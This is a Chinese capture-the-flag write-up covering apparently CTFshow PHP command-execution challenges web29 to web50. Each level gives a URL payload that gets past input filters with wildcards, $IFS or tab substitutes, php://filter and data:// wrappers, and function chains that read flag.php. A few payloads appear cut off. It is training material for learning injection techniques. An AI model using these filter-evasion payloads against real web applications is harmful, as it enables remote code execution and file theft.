29-35
Web29
代码利用正则匹配过滤了flag,后面加了/i所以不区分大小写。

可以利用通配符绕过
匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file *
? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0
abcd\] 匹配abcd中任何一个字符
\[a-z\] 表示范围a到z,表示范围的意思 \[\]匹配中括号中任意一个字符 ls file 0
?c=system('cat f*');//glob1
?c=system('cat f?ag.php');//glob2
?c=system('cat f\lag.php');//转义字符实现绕过
?c=system("cat f''lag.php");
?c=eval($_GET[1]);&1=system('cat flag.php'); //马中马嵌套过滤
#### Web30
和上一题差不多就是多了system和php的过滤,system用passthru代替即可。
?c=passthru('cat fla?.p?p');

#### Web31
这题多了cat、空格、单引号、逗号的过滤。

cat代替命令
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以\[pg dn\]\[pg up\]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容
空格代替
**\<,\<\>,%20(space),%09(tab),$IFS$9, I F S , {IFS},IFS,IFS**
?c=passthru("more%09fla*");
#### Web32
这题过滤多了 ; 和 ( 。分号我们可以用 ?\> 代替,因为php中最后一句代码可以不用加 ;,但是 ( 被过滤了也就意味着不能用命令执行函数了,因为命令执行函数都要使用到括号。

这里我们可以使用文件包含函数,如include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile,PHP中文件包含函数可以不用使用括号。
payload如下,解释一下啥意思,使用include函数包含参数1,而参数1是通过get获取的flag.php。
php:///filter:是 PHP 中用于数据流处理的流封装协议之一,它允许你在读取或写入文件时,通过指定的过滤器对数据进行处理。
read=convert.base64-encode:这部分指定了过滤器类型为读取(read)操作,并且使用convert.base64-encode过滤器对数据进行 Base64 编码。Base64 编码是一种将二进制数据转换为 ASCII 字符串的方法,常用于在需要文本表示二进制数据的场合。
resource=:这部分后面应该跟上你想要读取并编码的文件路径
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
返回的数据是base64编码,拿去解码即可。

#### Web33
和上一题并无啥区别,多了双引号的过滤,但是我们上一题的poyload并无用到双引号,所以直接套用上一题的payload即可。
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

#### Web34
观察了一下,只是多了冒号的过滤,上一题的payload我们没有用到冒号,所以继续套用即可。
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

#### Web35
过滤多了左尖括号和等于号,无所谓,依旧套用payload即可。
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

## 36-40
#### Web36
这题过滤了0-9数字,我还想这个%0a改用什么代替呢,一查原来include函数不需要空格也行,那不就好办了吗,直接套用web35的payload即可,去掉%0a,把参数1改为字母就行。
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

#### Web37
这题是通过C传参,接着使用include包含C,也就是把C的文件内容显示到页面上面,但是过滤了flag。我们可以用data伪协议,伪协议中的data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行,也就是说我们可以通过data伪协议造成rce。
data://协议用法:
data://text/plain,
data://text/plain;base64,

payload
?c=data://text/plain,
#### Web38
这题多了对php的过滤,直接套用上一题的payload坑定是不行了,查了一下原来在PHP中居然可以使用短标签 = 代替php,而且php不是必须的可以去掉,逆天了。
?c=data://text/plain,=system("cat f*")?>

#### Web39
这题没啥难度,就是拼接了个php,问题不大,直接套用上一题的payload即可。
?c=data://text/plain,=system("cat f*")?>

#### Web40
这题难度就上来了,可以看到几乎把所有的字符都过滤,只留下一个英文的括号。

这题要使用很多函数,我们先来了解一下。
print_r()函数不用多说,函数用于打印变量,作用对象是变量。
scandir()函数函数会扫描这个目录,并返回一个包含目录中所有文件和目录名的数组,也就是说scandir()会列出当前目录下的文件。
那么我们可以使用print_r(scandir('.'))来列出当前目录下的所有文件,并且打印在web页面。但是单引号和小数点都被过滤了,我们这里要找其他的函数来代替。
通过查找我们得知
localeconv():返回包含本地数字及货币信息格式的[数组](https://baike.so.com/doc/5545345-5760453.html "数组"),其中数组中的第一个为点号(.)

那不妨这样子想,如果我们能找到一个函数截取localeconv()的值,使其只返回第一个值那我们不就得到小数点了吗?
pos() 和current() 函数返回数组中的当前元素(单元),默认取第一个值。

此时我们可以打印出当前目录下的文件名,无需单引号也行好像。
?c=print_r(scandir(pos(localeconv())));

OK,现在的问题是怎么读取文件里面的内容呢,通过查阅得知,
next():函数将内部指针指向数组中的下一个元素,并输出。
但是通过我们刚刚列出来的数组得知目前的顺序是 ".","..","flag.php","index.php",那我们直接把它们的顺序调换不就刚刚好吗,也就是"index.php","flag.php","..",".",那么此时next()函数指向的下一个刚好是flag.php。
通过查找
array_reverse():数组逆序,将文件目录反转。
此时我们便可以构造payload。
?c=print_r(next(array_reverse(scandir(current(localeconv())))));
但依旧不行,因为print_r函数打印的是变量,而我们要输出的是文件,于是我们这里就只能用show_source或者highlight_file。
?c=show_source(next(array_reverse(scandir(current(localeconv())))));

## 41-45
#### Web41
没复现出来
#### Web42
这题会对我们输入的参数拼接一个重定向,解释一下
\> 代表重定向到哪里
/dev/null 代表空设备文件
2\> 表示stderr标准错误
\& 表示等同于的意思,2\>\&1,表示2的输出重定向等同于1
1 表示stdout标准输出,系统默认值是1,所以\>/dev/null等同于 1\>/dev/null
因此,\>/dev/null 2\>\&1 也可以写成1\> /dev/null 2\> \&1
1\> /dev/null:首先表示标准输出重定向到空设备文件,也就是不输出任何信息到终端,不显示任1何信息。
2\> \&1:接着,标准错误输出重定向到标准输出,因为之前标准输出已经重定向到了空设备文件,所以标准错误输出也重定向到空设备文件。

所以我们直接截断后面的语句即可。
?c=cat flag.php%0a
?c=cat flag.php||
?c=cat flag.php%26
?c=cat flag.php%26%26
?c=cat flag.php;
#### Web43
和上题目一摸一样的,只不过是多了cat的过滤,我们直接换成more即可。

#### Web44
多了flag的过滤,用我们上面说过的正则绕过即可。
?c=more%20fla*||

#### Web45
这题多了分号和空格的过滤。我们直接用%09代替空格即可
?c=more%09fla*||
## 
## 46-50
#### Web46
过滤了数字和\*,但是%09还能用。
?c=more%09fl?g.php||

#### Web47
这题对好几个查看flag的命令都做了过滤,但是没有过滤tac。
?c=tac%09fl?g.php||

#### Web48
依旧没有过滤tac,直接套用上一题的payload即可。

#### Web49
还是上一题的payload

#### Web50
这题多了对%过滤也就是说%09不能用了,那我们用\<去代替空格即可,奇怪的是用?通配符不知道为啥不行。
c=tac